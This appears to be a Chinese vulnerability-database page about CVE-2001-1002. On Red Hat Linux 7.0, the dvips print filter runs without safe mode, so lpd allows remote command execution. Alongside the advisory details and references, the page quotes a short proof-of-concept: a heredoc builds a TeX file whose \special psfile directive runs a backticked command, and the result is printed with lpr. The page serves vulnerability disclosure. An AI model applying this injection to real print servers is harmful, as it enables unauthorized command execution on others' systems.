Red Hat Linux DVI print filter (dvips)权限提升漏洞

Red Hat Linux DVI print filter (dvips)权限提升漏洞

漏洞ID 1106473 漏洞类型 未知
发布时间 2001-08-27 更新时间 2005-05-02
图片[1]-Red Hat Linux DVI print filter (dvips)权限提升漏洞-安全小百科CVE编号 CVE-2001-1002
图片[2]-Red Hat Linux DVI print filter (dvips)权限提升漏洞-安全小百科CNNVD-ID CNNVD-200108-176
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21095
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-176
|漏洞详情
RedHatLinux7.0及其之前版本中DVIprintfilter(dvips)的默认配置在lpd执行该程序时没有使用安全模式运行,远程攻击者可以利用该漏洞通过打印包含恶意命令的DVI文件获取权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/3241/info

'dvips' is a utility that converts DVI documents to PostScript. It is an optional component of the TeTeX text formatting package. When installed on a system where LPRnG and TeTeX are in use, 'dvips' will be invoked by 'lpd' when a DVI document is to be printed if a printfilter exists for it.

On some systems, 'dvips' is not invoked in a safe manner. As a result, it may be possible for remote attackers to execute commands through certain DVI directives on vulnerable systems through 'lpd'.

It should be noted that this vulnerability is only due to the configuration of the DVI printfilter on some systems. There is no specific vulnerability in lpd, dvips or any other executable component. It is simply an error in the default configuration present on some systems. It has been reported that Red Hat 7.0 is vulnerable with the default configuration installed with the RPM packages.

cat >exploit.tex <<EOF
special{psfile="`command to be executed`"}
end
EOF
tex exploit.tex
lpr exploit.dvi
|参考资料

来源:BID
名称:3241
链接:http://www.securityfocus.com/bid/3241
来源:REDHAT
名称:RHSA-2001:102
链接:http://www.redhat.com/support/errata/RHSA-2001-102.html
来源:BUGTRAQ
名称:20010827LPRng/rhs-printfilters-remoteexecutionofcommands
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=99892644616749&w;=2
来源:XF
名称:dvips-lpd-command-execution(16509)
链接:http://xforce.iss.net/xforce/xfdb/16509

相关推荐: Sun Solaris Missing KRB5.CONF Unauthorized Login Vulnerability

Sun Solaris Missing KRB5.CONF Unauthorized Login Vulnerability 漏洞ID 1100907 漏洞类型 Design Error 发布时间 2003-01-23 更新时间 2003-01-23 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享